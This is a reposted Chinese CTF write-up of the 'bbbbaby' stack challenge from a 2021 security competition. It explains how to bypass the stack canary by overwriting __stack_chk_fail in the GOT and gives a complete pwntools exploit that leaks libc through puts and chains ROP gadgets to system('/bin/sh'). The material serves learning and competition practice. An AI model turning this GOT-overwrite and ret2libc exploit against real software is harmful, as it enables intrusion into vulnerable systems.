2. 程式人生 > 其它 >隴原戰疫2021網路安全大賽--bbbbaby(pwn)

隴原戰疫2021網路安全大賽--bbbbaby(pwn)

阿新 發佈:2021-11-08

比賽題目記錄一下,這是唯一一道棧的題目。其他都是堆的題目,堆還沒怎麼開始學習。

這是一道需要修改 __stack_chk_fail@got 地址來繞過canary 的題目。程式中沒有 printf 函式我們沒有辦法洩露canary 的值。來看題目:

開啟了Canary 和 NX。沒有開啟 RELRO 我們就能修改函式的got表。

這是程式的主函式,我們需要需要輸入輸入數字來,實現函式功能。

這個函式我們可以實現地址任意寫入。因為它讓我們先輸入一個函式的地址,然後通過read函式往那個地址中寫入內容。

這個地方有棧溢位,我們輸入大小,通過read函式往 a1 中寫入內容,這裡的 a1

就是主函式中的 v5。我們可以看到 v5距離rbp的偏移是 0x110

我們需要修改 __stack_chk_fail@got 的地址讓在檢查canary被修改後執行別的函式這樣程式就不因為canary的值被修改而報錯,這樣也就繞過了canary。題目給了 libc庫所以修改完 __stack_chk_fail@got

我們構造ROP 按RET2LIBC來打就可以了。

from pwn import *

p=process('./pwn1')
#p=remote('node4.buuoj.cn',27412)
elf=ELF('./pwn1')
context.log_level='debug'
#libc=ELF('libc-2.23.so')
libc=elf.libc
rdi=0x0000000000400a03

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40090b))
p.sendlineafter('your choice\n','-1')
puts=u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
success('puts:'+hex(puts))
libc_base=puts-libc.sym['puts']
success('libc_base:'+hex(libc_base))

sh=libc_base+libc.search('/bin/sh').next()
system=libc_base+libc.sym['system']

p.sendlineafter('your choice','0')
p.sendlineafter('address:\n',str(0x601020))
p.sendlineafter('content:\n',p64(elf.plt['puts']))
p.sendlineafter('address:\n','-1')
p.sendlineafter('your choice\n','1')
p.sendlineafter('size:\n',str(0x200))
p.sendlineafter('content:\n','A'*0x110+'b'*8+p64(rdi)+p64(sh)+p64(system))
p.sendlineafter('your choice\n','-1')
p.interactive()

相關推薦

2021網路安全大賽--bbbbaby(pwn)

比賽題目記錄一下,這是唯一一道棧的題目。其他都是堆的題目,堆還沒怎麼開始學習。

2021網路安全大賽_Crypto部分WP

mostlycommom task.py: from Crypto.Util.number import bytes_to_long, getPrime f = open(\'flag.txt\', \'rb\')

2021年江西省網路安全大賽初賽MISC:extractall(迴圈解壓+斐波那契腦洞)

目錄解題思路總結 解題思路 在附件裡面的檔案長這樣: 首先點開hint.txt 發現,直接告訴瞭解壓包密碼是前一個解壓包的名字。

2021“天府杯”網路安全大賽落幕 崑崙實驗室奪冠

“天府杯”國際網路安全大賽致力成為全球第一的破解比賽,面向所有安全從業人員公開徵集參賽選手與參賽專案。參賽選手根據目標賽項設定報名參賽專案,比賽設定冠軍、亞軍、季軍獎。大賽共設立150萬美元的獎金,包含

寧波市第三屆網路安全大賽-WriteUp(Misc)

友情連結 Web師傅:skyxmao師傅 內心OS 第一次參加這種大型比賽,實力較菜,請師傅們多多指點

第三屆江西省網路安全大賽-部分Crypto

一、Round 題目附件如下: 比賽題目flag為\'CMISCCTF{}\'的模式,可以發現\':D@J::K=r<ecXi^\\[V:X\\jXit\'字串中,\'字元:\'的位置恰對應於flag格式中\'C\'的位置,猜測為移位密碼,指令碼如下:

2020上海市網路安全大賽 web writeup

原文:http://phoebe233.cn/?p=355 千毒網盤|2 www.zip原始碼,變數覆蓋 https://blog.csdn.net/weixin_30258901/article/details/96605162

CIS 2021網路安全創新大會《程式碼安全體系建設》實錄

一、背景 湯青松 ,北京趣加科技有限公司安全工程師,實體書《PHP WEB安全開發實戰》作者,擅長企業安全建設,SDL安全建設。

第二屆網刃杯網路安全大賽wp

第二屆網刃杯的wp: 1.REVERSE: 1.freestyle: 拖進ida main函式裡提示了flag是md5的格式,func1和func2裡有兩個方程;func1的方程解得3327,func2得方程有多個解,49,105......等;試一下332749和3327105的md5加密

智和信通獲“2021網路安全優秀創新成果大賽”解決方案入圍獎

2021年10月,“2021網路安全優秀創新成果大賽”圓滿落幕。據悉,本次大賽由中央網信辦網路安全協調局指導,中國網路安全產業聯盟主辦,是2021年國家網路安全宣傳週活動的組成部分,大賽分為分站賽初賽、半決賽和

[長安“網路安全衛士守護賽]no_cry_no_can

[CRYPTO] no_cry_no_can cazy{y3_1s_a_h4nds0me_b0y!} 得到py檔案 from Crypto.Util.number import* from secret import flag,key

2020第三屆江西省高校網路安全技能大賽線下解題賽部分wp

writed by:bmu隊 1.Easy-RSA下載附件後,發現是一個flag.en檔案和一個rsa_private_key.pem的私鑰檔案

CTF-i春秋-Web-檔案包含漏洞、檔案上傳漏洞-Do you know upload?-第三屆“百越杯”福建省高校網路空間安全大賽

2020.09.21 經驗教訓 檔案包含漏洞,想到php://input和php://filter/read=convert.base64-encode/resource=index.php

網路安全管理職業技能大賽WriteUP

網路安全管理職業技能大賽WriteUP 0X01 簽到 Base32解碼可得flag flag{546dcd6b-33cf-408e-a603-27760ada9844}

2021 西湖論劍・網路安全大會在杭州舉辦

4 月 25 日訊息以“安全:數字化改革之根基”為主題的 2021 西湖論劍・網路安全大會(第九屆“西湖論劍”)昨日在杭州順利舉行。

2021廣東省第一屆網路安全競賽

那個男人必須die 一個魔改md5的題。 IDA開啟檔案,找到主函式一片紅,發現有花指令。

2021 西部電子資訊展掠影:百度 Apollo 博人眼球,網路安全組團亮相

7 月 19 日訊息,2021 中國 (西部) 電子資訊博覽會日前在成都世紀城新國際會展中心盛大舉辦。C114 探訪了本屆展會,看到了諸多亮點,例如網路安全產業鏈組團展出,百度 Apollo 自動駕駛吸睛無數,國內外儲存廠商各顯

2021 國家網路安全宣傳週將於 10 月 11 日至 17 日舉行:普及網路安全知識、推廣網路安全技能

9 月 30 日訊息2021 年國家網路安全宣傳週新聞釋出會今日在京舉行,確定 2021 年國家網路安全宣傳週將於 10 月 11 日至 17 日在全國範圍內統一開展,主題為“網路安全為人民,網路安全靠人民”。據悉,此次宣傳活動

2021年春秋杯網路安全聯賽秋季賽 勇者山峰部分wp

1.簽到題-Crypto Vigenere 根據題目Vigenere可看出是維吉尼亞密碼 使用線上網站破解 https://guballa.de/vigenere-solver

北京智和信通喜獲中國網路安全產業聯盟“2021 年度先進會員單位”榮譽稱號喜報 | 北京智和信通喜獲中國網路安全產業聯盟“2021 年度先進會員單位”榮譽稱號

新年伊始,北京智和信通技術有限公司喜獲中國網路安全產業聯盟“2021 年度先進會員單位”榮譽稱號。